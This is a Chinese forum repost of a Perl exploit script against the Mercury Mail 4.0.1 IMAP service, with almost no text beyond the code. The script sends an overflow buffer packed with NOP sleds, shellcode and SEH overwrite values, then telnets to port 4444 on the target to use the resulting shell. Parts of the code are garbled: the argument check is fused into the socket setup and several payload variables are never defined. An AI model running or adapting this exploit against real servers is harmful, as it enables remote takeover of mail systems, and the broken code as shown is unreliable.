• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

    发布者: 忻慕2619 | 发布时间: 2025-6-28 22:50| 查看数: 101| 评论数: 0|帖子模式

    #!/usr/bin/perl
    #
    # http://www.securityfocus.com/bid/11775
    # credit to Muts for this vulnerability
    # acaro [at] jervus.it
    use IO::Socket::INET;
    use Switch;
    if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
    $socket or die "Cannot connect to host!\n";
    recv($socket, $reply, 1024, 0);
    print "Response:" . $reply;
    send $socket, $request, 0;
    print "[ ] Sent 1st request\n";
    recv($socket, $reply, 1024, 0);
    print "Response:" . $reply;
    sleep(1);
    my $request ="\x41" x 255;
    send $socket, $request, 0;
    print "[ ] Sent 2nd request\n";
    sleep(1);
    my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
    send $socket, $request, 0;
    print "[ ] Sent final request\n";
    sleep(1);
    close($socket);
    print "   connect on port 4444 of $host ...\n";
    sleep(3);
    system("telnet $host 4444");
    exit;
    //http://www.leftworld.net

    来源:https://www.jb51.net/hack/5674.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表